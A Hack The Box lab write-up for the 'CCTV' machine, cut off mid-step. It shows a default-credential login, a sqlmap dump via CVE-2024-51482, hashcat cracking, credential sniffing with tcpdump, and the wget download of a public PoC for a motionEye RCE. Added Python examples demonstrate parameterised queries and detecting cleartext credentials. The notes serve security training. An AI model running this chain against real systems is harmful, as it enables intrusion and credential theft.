📦 CCTV
📹 HTB CCTV - Solution Notes
Platform: Hack The Box
Machine: CCTV
OS: Linux (Ubuntu 24.04)
Difficulty: Medium
Date: March 27, 2026
CVEs: CVE-2024-51482, CVE-2025-60787
🗺️ Attack Chain
Nmap → Web recon (ZoneMinder) → admin:admin login → SQLi (CVE-2024-51482)
→ Hash dump → Hashcat → SSH (mark) → Internal traffic sniffing with tcpdump
→ sa_mark credentials → motionEye RCE (CVE-2025-60787) → ROOT
🧠 How Does a Hacker Think? - Before You Begin
When starting a machine, there should be one question in your mind: "What is this system's exposed surface?"
1️⃣ Reconnaissance
Port Scanning
```bash
nmap -sV -sC -O 10.129.243.147
```
Findings:
💡 What is Nmap? What Do the Parameters Mean?
/etc/hosts Setup
```bash
echo "10.129.243.147 cctv.htb" | sudo tee -a /etc/hosts
```
💡 Why Do We Add It to /etc/hosts?
🧠 How Does a Hacker Think? - Approaching a Web Application
We see a web application. Now we need to ask these questions:
2️⃣ Web Application Discovery
The homepage presents a company site called "SecureVision CCTV & Security Solutions." The "Staff Login" button leads to the /zm endpoint.
```bash
curl -s http://cctv.htb/ | grep -i "href\|login"
# Output: href="http://cctv.htb/zm" → Staff Login
```
ZoneMinder Detection
```bash
curl -s http://cctv.htb/zm/ | grep -i "title\|version"
# Output: <title>ZM - Login</title>
```
💡 What is ZoneMinder?
Login - Default Credentials
```bash
curl -s -X POST http://cctv.htb/zm/index.php \
  -d "username=admin&password=admin&action=login&view=login" \
  -c cookies.txt -L | grep -i "monitor\|welcome"
```
admin:admin login succeeded!
💡 Why Do Default Credentials Work?
Version Detection
```bash
curl -s -b cookies.txt http://cctv.htb/zm/api/host/getVersion.json
# Output: {"version":"1.37.63","apiversion":"2.0"}
```
🧠 How Does a Hacker Think? - CVE Hunting
We now know the version: ZoneMinder 1.37.63. What should we do next?
3️⃣ SQL Injection - CVE-2024-51482
💡 What is SQL Injection?
💡 What is sqlmap?
```bash
sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
  --cookie="ZMSESSID=<SESSION_ID>" \
  -p tid --dbms=mysql --batch \
  -D zm -T Users -C "Username,Password" --dump
```
Results:
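The root cause behind this class of bug is an integer-looking parameter such as `tid` being concatenated straight into a SQL statement. The following added example (written for these notes, not code from ZoneMinder; the `event_tags` table and the `remove_tag_*` function names are constructed for illustration) shows the vulnerable pattern next to its hardened form, using an in-memory SQLite database so it runs offline:

```python
import sqlite3


def build_db():
    """Constructed sample schema: three tag rows attached to two events."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE event_tags (Id INTEGER PRIMARY KEY, TagId INTEGER, EventId INTEGER)"
    )
    conn.executemany(
        "INSERT INTO event_tags VALUES (?, ?, ?)",
        [(1, 1, 10), (2, 2, 10), (3, 3, 11)],
    )
    conn.commit()
    return conn


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM event_tags").fetchone()[0]


def remove_tag_vulnerable(conn, tid):
    """Vulnerable pattern: the request parameter is pasted into the query text.

    Whatever string arrives as `tid` becomes part of the SQL, so the WHERE
    clause is under the caller's control. Returns the remaining row count.
    """
    conn.execute(f"DELETE FROM event_tags WHERE TagId = {tid}")
    conn.commit()
    return row_count(conn)


def remove_tag_hardened(conn, tid):
    """Hardened form: validate the type, then bind the value as a parameter.

    int() rejects anything that is not a plain integer, and the `?`
    placeholder hands the value to the driver as data, never as SQL text.
    """
    try:
        tid_int = int(tid)
    except (TypeError, ValueError):
        raise ValueError("tid must be an integer")
    conn.execute("DELETE FROM event_tags WHERE TagId = ?", (tid_int,))
    conn.commit()
    return row_count(conn)


if __name__ == "__main__":
    # A benign request removes exactly one row in both versions.
    print("hardened, tid=2 ->", remove_tag_hardened(build_db(), "2"))
    # A tampered parameter wipes the table in the vulnerable version ...
    print("vulnerable, tampered tid ->", remove_tag_vulnerable(build_db(), "2 OR 1=1"))
    # ... and is rejected before reaching the database in the hardened one.
    try:
        remove_tag_hardened(build_db(), "2 OR 1=1")
    except ValueError as exc:
        print("hardened, tampered tid ->", exc)
```

The same split applies to any database layer: the fix is not escaping characters in the string but keeping user input out of the statement text entirely. Logging and rejecting non-integer values for `tid` also gives a cheap detection signal for scanners probing the parameter.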
🧠 How Does a Hacker Think? - Hash Cracking
We have the hashes. But these are bcrypt hashes: bcrypt is a one-way hash function, so the passwords are neither stored in plain text nor encrypted in a way that can be undone. We can't reverse them; the only option is to guess candidate passwords and check each one against the hash.
4️⃣ Hash Cracking - Hashcat
💡 What is Hashcat? What Does -m 3200 Mean?
```bash
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
```
Result:
```text
mark : opensesame
```
5️⃣ SSH Login
```bash
ssh mark@cctv.htb
# Password: opensesame
```
```bash
id
# uid=1000(mark) gid=1000(mark) groups=1000(mark),24(cdrom),30(dip),46(plugdev)
```
🧠 How Does a Hacker Think? - Inside the System, What's Next?
We're in, but we're mark, not root. Now we need to ask:
6️⃣ Internal Traffic Sniffing with tcpdump
💡 What are Linux Capabilities?
```bash
tcpdump -i any -A port 5000 2>/dev/null
```
Captured traffic:
```text
USERNAME=sa_mark;PASSWORD=X1l9fx1ZjS7RZb;CMD=disk-info
```
A Python Flask service sends cleartext credentials to motionEye at regular intervals in this format. Because the connection is unencrypted, the credentials are readable by anyone who can capture the traffic.
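From the defender's side, the same fact that made this step possible (credentials travelling as a fixed `USERNAME=...;PASSWORD=...;CMD=...` string) makes the leak easy to detect and to scrub from packet captures before they are shared. The example below is added for these notes and is not part of the original write-up or the machine's own service; the capture text, the `svc_backup` account and its password are constructed samples in the same format as the traffic shown above:

```python
import re

# Matches the key=value;key=value payload format observed on port 5000.
# CMD is optional so the pattern also fires on payloads that omit it.
CRED_RE = re.compile(
    r"USERNAME=(?P<user>[^;\s]+);PASSWORD=(?P<password>[^;\s]+)"
    r"(?:;CMD=(?P<cmd>[^;\s]+))?",
    re.IGNORECASE,
)

# Constructed sample: a few lines of `tcpdump -A` style output, including
# binary header noise, one JSON reply, and two credential payloads.
SAMPLE_CAPTURE = """..E..L..@.@..
USERNAME=svc_backup;PASSWORD=ExamplePass123;CMD=disk-info
{"status":"ok"}
USERNAME=svc_backup;PASSWORD=ExamplePass123;CMD=disk-info
"""


def find_cleartext_credentials(capture):
    """Return one finding per credential payload, without the secret itself.

    Only the line number, account name, command and password length are
    reported, so the alert can be forwarded without re-leaking the password.
    """
    findings = []
    for lineno, line in enumerate(capture.splitlines(), start=1):
        for m in CRED_RE.finditer(line):
            findings.append(
                {
                    "line": lineno,
                    "user": m.group("user"),
                    "cmd": m.group("cmd"),
                    "password_length": len(m.group("password")),
                }
            )
    return findings


def _mask(m):
    cmd = f";CMD={m.group('cmd')}" if m.group("cmd") else ""
    return f"USERNAME={m.group('user')};PASSWORD=[REDACTED]{cmd}"


def redact(capture):
    """Return the capture with every password field replaced by [REDACTED]."""
    return CRED_RE.sub(_mask, capture)


def affected_accounts(findings):
    """Distinct (user, cmd) pairs seen, for the incident summary."""
    return sorted({(f["user"], f["cmd"]) for f in findings})


if __name__ == "__main__":
    found = find_cleartext_credentials(SAMPLE_CAPTURE)
    for f in found:
        print(f"line {f['line']}: account {f['user']} sent a "
              f"{f['password_length']}-char password in the clear (cmd={f['cmd']})")
    print("accounts to rotate:", affected_accounts(found))
    print(redact(SAMPLE_CAPTURE))
```

In practice this runs over the text form of a capture (for example the output of `tcpdump -A` or `tshark -T fields`); any hit means the account's password must be treated as compromised and rotated, and the service should be moved to an authenticated, encrypted channel rather than merely filtered.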
Lateral Movement - Switching to sa_mark
💡 What is Lateral Movement?
```bash
su sa_mark
# Password: X1l9fx1ZjS7RZb
bash  # upgrade the shell
```
🚩 User Flag
```bash
cat /home/sa_mark/user.txt
```
🧠 How Does a Hacker Think? - Final Step: Root
We're sa_mark. No sudo. But looking at local ports, 8765 stands out.
7️⃣ Privilege Escalation - CVE-2025-60787 (motionEye RCE)
💡 What is motionEye? How Does the Vulnerability Work?
motionEye Version Check
```bash
curl -s http://127.0.0.1:8765/ | grep "version"
# Output: v=0.43.1b4 → Vulnerable to CVE-2025-60787!
```
Download and Run the PoC
On Kali:
```bash
wget https://raw.githubusercontent.com/gunzf0x/CVE-2025-60787/main/CVE-2025-60787.py -O /tmp/CVE-2025-60787.py
python3 -m http.server 8080 --directory /tmp
```
On the target machine: